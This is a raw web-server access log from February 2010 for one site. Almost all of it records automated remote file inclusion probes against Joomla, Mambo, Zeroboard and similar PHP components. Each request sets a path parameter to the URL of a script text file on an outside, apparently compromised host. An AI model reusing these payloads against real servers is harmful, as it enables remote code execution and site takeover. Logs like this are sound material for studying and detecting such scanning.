216.211.138.220 - - [19/Feb/2010:10:27:10 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:28:33 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:28:33 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:28:33 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:29:07 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:29:07 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:29:07 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:31:47 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:32:02 -0800] "GET /logs/access_100131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:10:32:28 -0800] "GET /logs/access_100118.log//zboard//skin/zero_vote/error.php?dir=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:10:32:29 -0800] "GET /zboard//skin/zero_vote/error.php?dir=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:10:32:29 -0800] "GET /logs//zboard//skin/zero_vote/error.php?dir=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:10:32:42 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:10:32:42 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:10:32:42 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:33:46 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:33:50 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:33:57 -0800] "GET /logs/access_100210.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:10:34:19 -0800] "GET /logs/access_100116.log//zboard//skin/zero_vote/error.php?dir=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:10:36:17 -0800] "GET /logs/access_100124.log%20%20/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:10:36:17 -0800] "GET /logs/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:10:36:17 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:10:36:20 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:10:36:22 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:36:33 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:36:33 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:36:33 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:36:34 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:10:37:11 -0800] "GET /logs/access_100124.log/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:10:37:17 -0800] "GET /logs/access_100119.log/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:10:38:43 -0800] "GET /logs/access_100125.log/write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:10:38:43 -0800] "GET /logs/write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:10:38:43 -0800] "GET /write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:10:38:49 -0800] "GET /logs/access_100120.log/write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:39:11 -0800] "GET /logs/access_100124.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:39:37 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:39:42 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:10:40:37 -0800] "GET /delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:10:40:37 -0800] "GET /logs/access_100118.log//delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:10:40:37 -0800] "GET /logs//delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:10:41:09 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:10:41:09 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:10:41:09 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:10:41:12 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:10:41:25 -0800] "GET /skin/zero_vote/error.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:10:41:26 -0800] "GET /logs/access_100119.log//skin/zero_vote/error.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:10:41:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:10:41:44 -0800] "GET /logs/access_100128.log//delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
66.230.221.15 - - [19/Feb/2010:10:43:01 -0800] "GET /logs/access_100205.log%20%20//write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [19/Feb/2010:10:43:01 -0800] "GET /logs//write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [19/Feb/2010:10:43:01 -0800] "GET /write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:10:43:22 -0800] "GET /logs/access_100111.log/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:44:01 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:44:01 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:44:01 -0800] "GET /logs/access_100116.log%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:44:14 -0800] "GET /logs//write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:44:14 -0800] "GET /logs/access_100205.log%20%20//write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:44:14 -0800] "GET /write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:44:55 -0800] "GET /logs/access_100121.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:47:34 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:47:34 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:10:47:34 -0800] "GET /logs/access_100116.log%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:47:43 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:47:43 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:47:43 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:47:44 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:47:44 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:47:44 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:48:36 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:48:36 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:49:58 -0800] "GET /logs/access_100124.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [19/Feb/2010:10:50:21 -0800] "GET /logs/help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [19/Feb/2010:10:50:21 -0800] "GET /logs/access_100204.log/help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [19/Feb/2010:10:50:21 -0800] "GET /help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:50:22 -0800] "GET /logs/access_100123.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:50:22 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:50:23 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.174.53 - - [19/Feb/2010:10:50:44 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.174.53 - - [19/Feb/2010:10:50:44 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.174.53 - - [19/Feb/2010:10:50:44 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:10:51:06 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:10:51:06 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:10:51:06 -0800] "GET /index.php?DOCUMENT_ROOT=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [19/Feb/2010:10:52:24 -0800] "GET /logs/access_100204.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [19/Feb/2010:10:52:24 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [19/Feb/2010:10:52:24 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:52:44 -0800] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:10:53:26 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:10:53:26 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:10:53:26 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:10:54:06 -0800] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:10:54:15 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:10:54:15 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:54:34 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:10:55:02 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:10:55:02 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:10:55:02 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:10:55:28 -0800] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:10:56:12 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [19/Feb/2010:10:57:21 -0800] "GET /logs/access_100204.log//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [19/Feb/2010:10:57:21 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [19/Feb/2010:10:57:21 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
